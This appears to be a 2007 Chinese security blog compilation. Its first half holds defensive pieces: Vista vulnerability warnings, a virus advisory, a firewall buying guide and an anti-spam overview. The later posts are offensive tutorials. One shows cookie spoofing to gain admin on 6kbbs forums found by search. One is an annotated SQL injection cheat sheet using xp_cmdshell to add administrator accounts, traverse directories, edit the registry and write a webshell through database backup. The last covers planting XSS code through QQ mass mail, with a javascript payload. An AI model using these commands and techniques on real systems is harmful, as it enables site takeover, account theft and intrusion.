由于脚本的执行离不开Windows Script Host(WSH)的支持,虽然WSH 从5.6开始,可以成功避免对Windows脚本宿主不加限制的滥用,但是黑客通过修改注册表的相关内容就可以成功躲过这一限制,这一情况在Vista中也很难改观。所以用户无论在什么时候,尤其是上网的时候,一定要将杀毒软件的脚本监控功能打开,通过对恶意脚本实施拦截,可以避免大量利用恶意脚本进行的黑客入侵。

漏洞预警七:账户控制绕过安全限制漏洞

类型:本地提权漏洞

危险程度:★★★☆

漏洞被利用后果:受限制用户本地提权,获取最高权限

Vista中的最大变化非UAC莫属。UAC即用户账户控制,它的核心在于,当相应的程序或任务执行可能会影响计算机运行的操作,或执行更改影响其他用户的设置的操作时,系统即会弹出相应的警告信息并等待用户确认。

用于保护系统免受入侵的UAC功能,在可靠性上并不完美。比如安装一款程序时,UAC询问用户是否进行运行,当用户确认后,UAC就会认为利用已经安装的程序执行的命令具有和该程序一样的权限。如果用户运行的程序捆绑了木马,那么该木马执行的所有命令都将获得一样高的权限,这样UAC的安全功能就被成功绕过。如果和恶意脚本进行配合入侵,那么该功能也就形同虚设。此前已经有安全公司指出Vista存在可仿冒访问令牌的漏洞,尽管微软表示“这还算不上是漏洞,充其量只能说是不完备”,但这种“不完备”能被黑客利用到哪种程度就不太好说了。

漏洞预警八:语音识别远程执行漏洞

类型:远程执行漏洞

危险程度:★★★

漏洞被利用后果:黑客通过语音对系统进行诸如格式化等操作

Windows语识别系统是Vista中一个很有价值的利用工具,用户可以通过语音和计算机交流,这对于操作键盘和鼠标设备不熟悉的人们是一个尤其有用的功能。你可以训练Vista识别你的语音,以便以后通过语音来执行大多数常见任务。

可是Vista其中的一个安全隐患就源自于语音识别系统。漏洞在于黑客可以事先录下一段带有操作指令的声音,通过网页背景音乐等形式在用户电脑扬声器上播放从而操纵电脑。如果用户已启用语音识别功能,黑客就可以通过构建恶意网页等办法让计算机用户下载和播放一段含有恶意指令的录音,这样黑客根本不用动手就可以远程控制你的计算机系统了。

漏洞预警九:家长控制权限绕过漏洞

类型:权限绕过漏洞

危险程度:★★★

漏洞被利用后果:管理员用户对系统进行的限制形同虚设

通过“家长控制”功能,用户可以对儿童使用计算机的方式进行协助管理。当“家长控制”阻止了对某个网页或游戏的访问时,将显示一个通知声明已阻止该网页或程序。

“家长控制”功能看上去非常不错,给那些担心孩子过度使用电脑的家长提供了一个很好的防范措施。但是根据微软以往的经验,这样的功能限制常常可以轻易绕过。比如系统防火墙就是一个很好的例子,因为程序所有的设置内容都将保存到注册表之中。所以孩子只要找到注册表中相关设置内容的保存之处,然后直接通过修改注册表中的设置,即可轻松地绕过“家长控制”功能中的所有设置。

漏洞预警十:Windows Defender绕过文件检测漏洞

类型:绕过文件检测漏洞

危险程度:★★★

漏洞被利用后果:Windows Defender无法对系统进行有效保护

Windows Defender被直接集成到了“Vista”操作系统当中,它是微软推出的一款反间谍软件,现在用户可以获得免费的技术支持和在线更新代码特征库。

可是Windows Defender在面对同一个恶意程序的时候会作出不同的判断。比如Windows Defender可以对没有伪装的恶意程序进行查杀,而将恶意程序和其他程序进行捆绑以后,Windows Defender就无法进行判断操作了。这样一来,黑客就可以很容易地绕过它的检测。

五一临近 网友需警惕病毒传播三大途径

天极yesky

  五一临近,人们都在规划着自己的长假。但反病毒专家提醒广大用户,无论外出旅游还是在家上网、玩游戏都要警惕电脑病毒的“偷袭”。金山毒霸反病毒专家表示,“数码相机、下载电影、浏览网页已成为五一长假期间病毒传播的主要途径,用户需高度警惕。”

  “前几天,在将数码相机中的照片导入电脑后,电脑就开始运行缓慢,而且在浏览网页的过程中还不断地弹出一些广告窗口,严重影响正常上网。”某SP公司高级经理崔小姐无奈地表示。

  “上周本想通过网络下载几部电影,没想到,下载了一堆病毒,机器反复重启,最后只好一狠心把硬盘给格了,特别郁闷!”网民刘先生对此非常气愤。

  “我每天基本上就上网看看新闻,从来不登陆一些不知名的网站,看没想到,还是感染了病毒,昨天偶然安装了一个杀毒软件,一查中了20几个木马,真是让人难以置信!”某国企职员李先生表示。

  金山毒霸反病毒专家戴光剑指出,长假期间,上网人群短期内迅速增加,网络病毒往往利用广大网民疏于防范的心理大肆作案。长假过程中,利用数码相机拍照、下载电影、浏览网页的用户比较多,所以这三种方式也最易被病毒利用,大量盗号类木马通过以上方式入侵到用户的电脑,从而给用户带来经济上的损失。

  五一长假期间,病毒传播的三大主要途径:

  1、数码相机带毒。近段时间,利用移动存储进行传播的病毒频繁出现,比如末日阴影,而数码相机的存储卡作为一种存储介质,自然也成为病毒传播的通道之一。用户在将数码相机与电脑连接的过程中,病毒即开始传播。

  2、下载电影。捆绑下载文件已经成为病毒传播的一个常见方式。一些病毒往往利用当下的热点事件,比如最新的电影、新闻等等,捆绑其中,吸引用户下载,从而感染用户电脑。

  3、浏览网页。网页已经成为病毒传播的主要途径。病毒制作者往往将病毒植入到网页中,表面上毫无异常,但用户一但登陆该网站,不知不觉就感染了病毒。

  为了广大网民能够安全度过五一长假,金山毒霸特别设立了网络求助专区(www.duba.net),长假期间用户遇到任何与病毒相关的问题均可通过专区进行求助。同时专家建议广大用户,安装正版杀毒软件,及时更新,并开启实时监控以及防火墙等功能,

  读取移动存储内的资料前一定提前扫描,养成良好的网络使用习惯,不登陆不良网站,尽量到正规的大网站进行下载,及时安装微软发布的安全补丁,以防病毒利用漏洞进行传播。

星期二, 四月 24, 2007

专家教你如何鉴别防火墙的实际功能差异

专家教你如何鉴别防火墙的实际功能差异

作者:db19851217 来源:赛迪网技术社区

有一些问题常令用户困惑:在产品的功能上,各个厂商的描述十分雷同,一些“后起之秀”与知名品牌极其相似。面对这种情况,该如何鉴别?

描述得十分类似的产品,即使是同一个功能,在具体实现上、在可用性和易用性上,个体差异地十分明显。

一、网络层的访问控制

所有防火墙都必须具备此项功能,否则就不能称其为防火墙。当然,大多数的路由器也可以通过自身的ACL来实现此功能。

1、规则编辑

对网络层的访问控制主要表现在防火墙的规则编辑上,我们一定要考察:对网络层的访问控制是否可以通过规则表现出来?访问控制的粒度是否足够细?同样一条规则,是否提供了不同时间段的控制手段?规则配置是否提供了友善的界面?是否可以很容易地体现网管的安全意志?

2、IP/MAC地址绑定

同样是IP/MAC地址绑定功能,有一些细节必须考察,如防火墙能否实现IP地址和MAC地址的自动搜集?对违反了IP/MAC地址绑定规则的访问是否提供相应的报警机制?因为这些功能非常实用,如果防火墙不能提供IP地址和MAC地址的自动搜集,网管可能被迫采取其他的手段获得所管辖用户的IP与MAC地址,这将是一件非常乏味的工作。

3、NAT(网络地址转换)

这一原本路由器具备的功能已逐渐演变成防火墙的标准功能之一。但对此一项功能,各厂家实现的差异非常大,许多厂家实现NAT功能存在很大的问题:难于配置和使用,这将会给网管员带来巨大的麻烦。我们必须学习NAT的工作原理,提高自身的网络知识水平,通过分析比较,找到一种在NAT配置和使用上简单处理的防火墙。

二、应用层的访问控制

这一功能是各个防火墙厂商的实力比拼点,也是最出彩的地方。因为很多基于免费操作系统实现的防火墙虽然可以具备状态监测模块(因为Linux、FreeBSD等的内核模块已经支持状态监测),但是对应用层的控制却无法实现“拿来主义”,需要实实在在的编程。

对应用层的控制上,在选择防火墙时可以考察以下几点。

1、是否提供HTTP协议的内容过滤?

目前企业网络环境中,最主要的两种应用是WWW访问和收发电子邮件。能否对WWW访问进行细粒度的控制反映了一个防火墙的技术实力。

2、是否提供SMTP协议的内容过滤?

对电子邮件的攻击越来越多:邮件炸弹、邮件病毒、泄漏机密信息等等,能否提供基于SMTP协议的内容过滤以及过滤的粒度粗细成了用户关注的焦点。

3、是否提供FTP协议的内容过滤?

在考察这一功能时一定要细心加小心,很多厂家的防火墙都宣传说具备FTP的内容过滤,但细心对比就会发现,其中绝大多数仅实现了FTP协议中两个命令的控制:PUT和GET。好的防火墙应该可以对FTP其他所有的命令进行控制,包括CD、LS等,要提供基于命令级控制,实现对目录和文件的访问控制,全部过滤均支持通配符。

三、管理和认证

这是防火墙非常重要的功能。目前,防火墙管理分为基于WEB界面的WUI管理方式、基于图形用户界面的GUI管理方式和基于命令行CLI的管理方式。

各种管理方式中,基于命令行的CLI方式最不适合防火墙。

WUI和GUI的管理方式各有优缺点。

WUI的管理方式简单,不用专门的管理软件,只要配备浏览器就行;同时,WUI的管理界面非常适合远程管理,只要防火墙配置一个可达的IP,可实现在美国管理位于中国分公司的防火墙。

WUI形式的防火墙也有缺点:首先,WEB界面非常不适合进行复杂、动态的页面显示,一般的WUI界面很难显示丰富的统计图表,所以对于审计、统计功能要求比较苛刻的用户,尽量不要选择WUI方式;另外,它将导致防火墙管理安全威胁增大,如果用户在家里通过浏览器管理位于公司的防火墙,信任关系仅仅依赖于一个简单的用户名和口令,黑客很容易猜测到口令,这增加了安全威胁。

GUI是目前绝大多数防火墙普遍采用的方式。这种方式的特点是专业,可以提供丰富的管理功能,便于管理员对防火墙进行配置。但缺点是需要专门的管理端软件,同时在远程和集中管理方面没有WUI管理方式灵活。

四、审计和日志以及存储方式

目前绝大多数防火墙都提供了审计和日志功能,区别是审计的粒度粗细不同、日志的存储方式和存储量不同。

很多防火墙的审计和日志功能很弱,这一点在那些以DOM、DOC等电子盘(并且不提供网络数据库支持)为存储介质的防火墙中体现得尤为明显,有些甚至没有区分事件日志和访问日志。如果需要丰富的审计和日志功能,就需要考察防火墙的存储方式,如果是DOM、DOC等Flash电子盘的存储方式,将可能限制审计和日志的功能效果。

目前绝大多数防火墙审计日志采用硬盘存储的方式,这种方式的优点是可以存储大量的日志(几个G到几十个G),但是在某些极端的情况下,如异常掉电,硬盘受到的损坏往往要比电子盘的损坏严重。

好的防火墙应该提供多种存储方式,便于用户灵活选择和使用。

五、如何区分包过滤和状态监测

一些小公司为了推销自己的防火墙产品,往往宣称采用的是状态监测技术; 从表面上看,我们往往容易被迷惑。这里给出区分这两种技术的小技巧。

1、是否提供实时连接状态查看?

状态监测防火墙可以提供查看当前连接状态的功能和界面,并且可以实时断掉当前连接,这个连接应该具有丰富的信息,包括连接双方的IP、端口、连接状态、连接时间等等,而简单包过滤却不具备这项功能。

2、是否具备动态规则库?

某些应用协议不仅仅使用一个连接和一个端口,往往通过一系列相关联的连接完成一个应用层的操作。比如FTP协议,用户命令是通过对21端口的连接传输,而数据则通过另一个临时建立的连接(缺省的源端口是20,在PASSIVE模式下则是临时分配的端口)传输。对于这样的应用,包过滤防火墙很难简单设定一条安全规则,往往不得不开放所有源端口为20的访问。

状态监测防火墙则可以支持动态规则,通过跟踪应用层会话的过程自动允许合法的连接进入,禁止其他不符合会话状态的连接请求。对于FTP来说,只需防火墙中设定一条对21端口的访问规则,就可以保证FTP传输的正常,包括PASSIVE方式的数据传输。这一功能不仅使规则更加简单,同时消除了必须开放所有20端口的危险。

不应只看数字防火墙测评需规避六个误区

作者:王一飞 来源:中国计算机报

防火墙测评不应只看数字,凡是都有失败的可能,硬件防火墙测评也不例外。笔者结合自己的实践体会,尝试着整理了产品用户在硬件防火墙测评中的常见误区,供同行探讨。

一、误信含糊实验条件的惊人数字

亲阅过无数防火墙产品广告,一个个白纸黑字标称的4G吞吐量让人炫目,但如果把“64字节小包”、“线速”、“坚持几分钟”之类字眼抛出来,销售人员就会对吞吐量自己先变的吞吞吐吐起来。所以不能轻信厂商提供的各项数据,必须拿标准实验条件的测试结果来比对,或者重新搭建环境亲自来测试。

二、喜欢数字,而不考虑可管理性

在测评中,用户往往过多地关注性能数字,但对于实际的网络安全管理来讲,两种产品间2%的差异、5%的差异就算10%的差异,真的能带来本质的区别么?一台防火墙配置界面操作是否方便?有否完备的日志管理功能?本墙能否存储日志?有无月度CPU、内存统计功能?可否方便查询已配策略……比起性能数字来,测评这些看似不切主题,但这种问题可是“谁用谁知道”!

三、关注花哨功能,却不了解性能的隐忧

这年头的防火墙,功能都是多多的,访问控制、防病毒、入侵检测/防御、VPN,叫功能异构也好,叫统一威胁管理也好,像个杂货铺一样。说这些功能“花哨”,是因为它们启动起来,对硬件资源性能的吞噬能力超乎人的想象。所以,拟定测评方案时就轻易不要把这些列在功能项里了吧?

四、不能科学看待高性能硬件架构

硬件防火墙的性能高下离不开硬件架构种类。所谓高性能硬件架构,是对应于X86的传统工控机架构而言的,常见的有NP、ASIC等。对于高性能硬件架构,我们既不能不关注,也不能迷信。但关注的同时,又不能过分推崇“NP”“ASIC”,因为,最强的不一定是最好的和最适合你的。

五、不结合自己网络特点考虑,不结合自己的安全战略考虑

脱离了用户自身的网络环境特点来测试防火墙是很不科学的,不基于自己安全战略设计防火墙测试指标,更是背离了产品应用的初衷。网络特点告诉用户自己的网里在跑什么样的包,构成成分、多大、什么协议。安全战略告诉用户防火墙买了是为了做什么,要怎么部、怎么配、怎么管。我们要为了“部”、“配”、“管”而“选”而“测”。

六、不警惕测试中的作弊行为

产品销售与购买属于商业行为,商业就不得不提防欺骗,在测试中则是要警惕作弊行为。假设极个别厂商制作了专门用来测试的高性能“竞争测试版”产品唬人,假设极个别厂商在设备内作一些手脚(如用网线直接连通),那么整个测试结果就会对其他诚信的厂商很不公平。

全面了解各种反“垃圾邮件”的解决方案

全面了解各种反“垃圾邮件”的解决方案

作者:db19851217 来源:赛迪网技术社区

自2000年后,互联网技术飞速发展,邮件技术已经逐步成为了现代社会最重要的沟通工具之一。然而,予生俱来的是垃圾邮件对邮件用户的侵扰;到2006年末,这种侵扰已经成为公认的最大的互联网应用威胁之一。有许多数字让人触目惊心:每天全球产生的垃圾邮件达1000封;用户收到的邮件之中,有94%是垃圾邮件;美国、中国是全世界最大的两个垃圾邮件生产国家和消费国;中国网民每周收到的垃圾邮件数平均达到了19.4封。这些垃圾邮件充斥着各种非请求的商业广告、色情与反动内容、政治敏感话题传播、甚至计算机病毒与恶意代码,给我们正常的邮件收发增加困难,使企业的网络与邮件资源被恶意浪费,甚至有可能对组织与个人的硬件资产遭受入侵、破坏等损失。垃圾邮件最新的形式是钓鱼邮件,Spammer通过传播类似银行及会员机构邮件的方式,来骗去用户的用户名和密码,直接获取非法利益;而有些则通过恶意代码控制计算机,使网络用户的计算机变成Zombie PC,利用这些PC来发送大量广告等垃圾邮件以获取商业价值。可以说,反垃圾邮件的斗争以及到了白热化的程度。

中国的反垃圾邮件技术研究几乎和国外同步,但产品化进程比较慢,基本上到2003年后才有初步能够应用的专业级产品与系统方案。在国际上,有两大开源社区比较权威,目前世界上大部分垃圾邮件的核心技术都来源这两个社区,一个是著名的SpamAssassin,一个是,Razor。而中国目前还没有形成比较成规模的反垃圾邮件技术开源社区。在技术上,特别是产品结构上都借鉴这些著名的先行者。

说到反垃圾邮件的技术方案,一般有三种类型的解决方案。

第一种是初级的用户级客户端方案

大部分人都认为客户端方案效果不好,这里面其实有个误区,很多说法是包含了商业利益在里面的,所以就不能够客观的评价。客户端方案,有些人就认为是Foxmail、Outlook之类的邮件客户端自带的简单的黑白名单判别垃圾邮件功能,其实这是有误的。真正的客户端方案,不仅包含这些黑白名单功能,也包括其他类型方案一样的一些手段,象实时RBL、指纹检查、信任网络、甚至包含内容过滤等技术,由于它服务的对象是“客户端个人用户”,没有关注邮件服务器而已,然后它仍然是专业级别的反垃圾邮件防方案。关键是,需要找到专业的产品,而且这种方案在50人以下应用环境时具有很好的经济价值,在超过50人的应用环境下,这种方案就没有其他的方案更具竞争力。代表产品是全球知名的反垃圾邮件技术公司Cloudmark公司的个人版反垃圾邮件产品。

第二类技术方案是反垃圾邮件网关方案

这种方案是目前应用最广泛,也是应用最简便的企业级反垃圾邮件方案。这种方案是各种反垃圾邮件技术综合到一台设备或者软件系统当中去,放在邮件服务器的前端,对进出邮件系统的所有邮件进行过滤、审查,对违反规则或者具有明显垃圾邮件特征的邮件予以处置。 网关型的反垃圾邮件方案,其形态可以是专用硬件产品,也可能是软件形式。需要特别强调的是,传统上认为硬件产品比软件产品好,这种认识也是有很大偏差的,需要差别的看:如果反垃圾邮件网关软件能够与邮件系统实现真正意义上的无缝结合的化,是能够大大提升系统的整体性能的,而不是象部分商业公司宣称的那样,硬件产品一定是最好的;原因很简单: 这中间节省了两个计算环节(反垃圾邮件系统在将邮件系统解包检后,可以不用打包就可以直接转给邮件系统接受;而邮件系统不需要先对邮件进行解包,就可以直接接受--减少动作,就意味着性能的提高)。

网关方案做为最主要的企业级反垃圾邮件方案,因各商业和研究机构的技术路线不同,主要有3种:基于经验规则和内容检查技术的技术路线。这类反垃圾邮件网关,以内容检查为主,主要的检查手段包括关键字过滤、贝叶斯过滤、基于规则的评分系统、邮件指纹检查、黑白名单技术、速率控制等等。需要的是提取样本、提取内容特征等信息,来检查与过滤垃圾邮件。代表的产品是梭子鱼反垃圾邮件系统。 需要注意的是,这类产品大多数需要进行大量的内容检查计算,对产品的系统结构和硬件平台的系统资源要求比较,性能峰值不是很高,特别是部分产品是用pear编写的,程序的限制,使得性能成为其最主要的瓶颈。 这点用户在选择时是需要关注的,选型时尽量采用高一点的型号,以应对突然的邮件高峰。

智能行为识别技术路线。由于认识到基于规则与内容技术路线在性能上的局限性,有部分技术人士摈弃了内容检查,而是将产品方案的主要检查手段放在了邮件的协议分析。 这类技术通过总结和分析垃圾邮件发送者的各种共性行为,比如用客户端群发软件发送、高频率发送、Dns伪装、IP欺骗等等方法,解析出这些“垃圾行为”的特征并形成规则,用这写规则来判别一封邮件是否合法。这类技术,同时包括了众多的邮件合规性认证机制;同时也包含了部分杀病毒等内容层技术。同样需要大家注意的是,这类技术针对的是大规模的、以群发为特征的垃圾邮件,而针对单个、无规律的、甚至是合法来源发送非法内容的邮件,没有很好的解决方案。因为它不强调内容检查,而对对垃圾邮件判定最重要的标准是内容”非法!但,这种技术已经能够拒绝大部分垃圾邮件了,因为绝大部分垃圾邮件确实是通过群发的方式产生的。这类产品的代表厂商是敏讯科技,以及来自台湾的硕奇公司反垃圾邮件产品(该公司更宣称完全运用行为识别技术来反垃圾邮件)。

混合模式路线。这种技术路线强调过程化处理技术,利用过程化处理技术整合各种反垃圾邮件技术,既包括基于协议分析的智能行为识别,也包括基于规则与内容检查的模式对比路线。反垃圾邮件网关在智能过程化处理平台的控制下,有次序的让邮件接受各个层次的合规性检查与内容检查。综合应用行为识别技术,在协议层对TCP/IP进行分析规范发件连接行为、在SMTP层对邮件从Hello、Auth、From、To、Data等各个层次进行合规性检查,对违发正常规则的邮件进行重点分析,对明显的群发行为予以处置。而内容检查阶段,也是严格按照“过程”来进行的,病毒查杀、用户级黑白名单、关键字、贝叶斯过滤、指纹检查、以及其他的基于内容检查的技术。 这类网关的设计架构比较好,“过程化”的处理办法,让大量的垃圾邮件在“前端”就被过滤掉,而在内容阶段系统的工作量非常的少,能够大幅度的提升系统的整体工作性能和垃圾处理能力。 这类产品的代表是Commontouch反垃圾引擎,以及智海华程CyanFilter反垃圾邮件引擎。 他们共同的特点是过程化处置,都拥有自己核心的反垃圾邮件引擎。Coummontouch的反垃圾引擎采用实时检查技术,轮回检查信任网络;而CyanFilter反垃圾邮件引擎则包含了中文分词、特征进化引擎技术等等,使得青莲Cyanlotus反垃圾网关更具有强大的中文垃圾能力。 另外,Cloudmark公司的电信级反垃圾邮件网关也同样拥有这中能力,其基因算法与全球最大“可信任用户网络”更是无与伦比。

第三类是ASP反垃圾邮件服务方案

这种方案主要针对用户数量少于500人的中小企业环境。反垃圾邮件服务提供商首先建立一个反垃圾邮件服务中心,这个中心的系统拥有同时向多域、多服务器提供反垃圾服务的能力。用户在购买了反垃圾邮件服务后,将自己邮件地址的MX记录指向该服务中心,该服务中心同时添加该用户域名,这样用户的邮件在到达用户的邮件系统(不管是购买的空间的方式,还是有独立服务器)前,首先达到ASP反垃圾邮件服务中心进行过滤检查,达到净化垃圾的目的。这种方案比较经济、不受地域和部署方式的限制。 但,目前为止,国内还没有实际投入运营的反垃圾邮件ASP出现。

用户,不管是个人用户还是企业级用户,在选择反垃圾邮件方案时,都需要认真考虑一下几个因素:

经济性。个人用户和数量比较少的企业,可以选择采用专业客户端或者ASP反垃圾邮件服务的解决方案,既节省投资也具有同样的反垃圾效果,而且免去了后期维护之类。

反垃圾系统的反垃圾效果。对反垃圾系统效果的评价一般包括垃圾邮件识别率、漏报率,同时更需要关注垃圾邮件误报率,特别是将正常邮件判别为垃圾邮件的“假阳性”误报问题,这是反垃圾邮件系统的最关键的参考因素。我们可以容忍一天收到若干垃圾邮件(当然是数量不多的情况下),但所有人都不能忍受有正常的邮件被错误的判定为“垃圾”而遭受“丢弃”!而评价反垃圾邮件系统反垃圾效果的方法,就是实际试用! 因为每个用户受的垃圾邮件类别是不一样的,有的用户垃圾邮件主要是英文垃圾、有的是中文垃圾、有的是图片的、有的则是广告文字的、还有的是钓鱼类的、而有的则是以病毒垃圾为住。不同的垃圾邮件特征,需要采用不同的反垃圾邮件产品方案:如英文垃圾多,则我们可以首选国外专业产品;如果中文垃圾多,则首先要考虑国内的,特别是有中文分词技术(由于中、日、韩三国语言的双字节及不分词的特殊性,一般反垃圾产品能难有效应对);而对病毒垃圾多的,则可以考虑主要由杀病毒公司提供的反垃圾邮件产品。

注重系统的整体性能。反垃圾邮件产品,如果性能不过关,随着业务的增长和垃圾邮件泛滥问题的日益严重,可能会有很大问题,另外性能问题有可能会影响我们正常的邮件收发效率;由于产品在设计和硬件配置上的缺陷(特别是产品结构与设计语言的缺陷),导致邮件堵塞、溢出、正常邮件丢失、系统瘫痪等等,将会使我们损失惨重!

管理简便与灵活性。一般来讲,灵活性与简便的要求是矛盾。我们的原则是,逐步减少网管人员和用户的工作量,同时又给予网管和用户最大限度的个性化需求。如每个用户都应该拥有自己的个性化黑白名单、自己个性化的关键字过滤策略等等,以使得我们反垃圾邮件系统更具有针对性和效率。选择产品时,一般要考虑web管理、参数设置简单、管理维护工作量少、拥有智能(特别是有自学习能力)的产品。同时,产品的升级要及时,特别是病毒库的升级。

综合以上的一些所述,用户在进行反垃圾邮件工作时,要全面了解各种反垃圾邮件方案与自己的实际需要想对应的程度,我们不能一味的听**厂家或者组织宣称自己是最好的和唯一好的解决方案,最好与最合适只有我们自己说了算。 品牌和市场保有量在中国没有参考意义(大部分品牌都是通过大量的宣传得来的,而中国用户是出名的“随大众,爱面子”),建议的做法是“试用”用实际效果说话!特殊的,在中国反垃圾,首先要把重点放在“中文”垃圾上、图片垃圾、钓鱼垃圾上! 同时,还要看该反垃圾方案是否具有完备的“挽回”机制,有全面的日志包括垃圾邮件日志、阻断邮件日志(大部分产品没有此功能)、病毒邮件日志以及收发的正常邮件日志。

反垃圾邮件是一件任重道远的事业,需要我们大家的共同努力。

黑客菜鸟教程之熟知Cookies文件的欺骗

黑客菜鸟教程之熟知Cookies文件的欺骗

作者:db19851217 来源:赛迪网技术社区

第一、几个基本概念

Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录。

那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。

第二、原理分析

我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113——124行,看下面:

if login=false then tl=" 登 陆 失 败" mes=mes&"

·返回重新填写" else Response.Cookies(prefix)("lgname")

=lgname session(prefix"lgname")=

lgname Response.Cookies(prefix)("lgpwd")=

lgpwd Response.Cookies(prefix)("lgtype")=

lgtype Response.Cookies(prefix)("lgcook")=

cook if cook>0 then Response.Cookies(prefix).Expires=

date+cook end if

我把这段话的意思换个说法,就是说如果你登录失败了他就显示你登录失败并引导你返回上一页,否则就给你写进Cookies里面,如果你的Cookies有的话那么你的过期时间就是你Cookies的过期时间——也就是你保存Cookies的时间了。

到这里,你想到什么了?对,以后登录它只要Cookies,那如果我的Cookies里面的信息是管理员的我岂不是成为管理员了?聪明,接着往下看我们怎么做。

第三、Cookies欺骗实例

在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码。怎么拿呢,到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆6kbbs的网站了,

首先,我们先去注册一个用户,然后登录,看到了吗?有个Cookies保存的选项,一定要选哦。我选择是保存一个月,因为保存了才会再你本机上写进它的Cookies。接着,打开数据库,看Admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了。有可能没有,没关系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺骗。

打开IECookiesView,这款软件是拿来察看和修改本机的Cookies的,很方便我们的Cookies欺骗入侵。

在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己的。点击“更改cookies”,打开一个新的IE,然后再去访问那个论坛,看到没有?你现在已经是管理员了。

题外话

1、对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是Session验证,不是Cookies,所以我们欺骗不了。

2、这个论坛还有上传漏洞,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。

3、Cookies欺骗大量存在于现在的一些不做Session验证的程序中,所以,如果你拿到数据库或者管理员加密密码,不妨试一下Cookies欺骗,会有意想不到的效果哦。

带注释手动注入脚本命令总结

整理了下手动注入脚本命令[带注释]

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ’’=’

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--

;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--

;and 1=(select IS_MEMBER(’db_owner’));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell ’net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ’c:\’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs ’c:\’;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- 获得所有子目录的目录树构

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:\web\index.asp’;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread

’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’ 删除某个值

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’c:\l.asp’;

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’g:\wwwtest\l.asp’;

星期日, 四月 22, 2007

利用QQ群发邮件跨站挂马

利用利用QQ群发邮件跨站挂马

记得以前搞博客跨站挂马!

是利用下面这段弹窗的:

<img src=javascript:open('http://www.slenk.net','幽月','width=400,height=300')>现在漏 洞被封啦!

下面搞QQ邮箱挂马:

大家可以利用QQ群发工具或软件来利用:

这是新漏洞!

这是跨站的代码。可以直接支持JS 但QQ有过滤空格,相信大家应该明白这一点。空格被转换成“ ” “ ”在HTML下代表空格。

源代码:

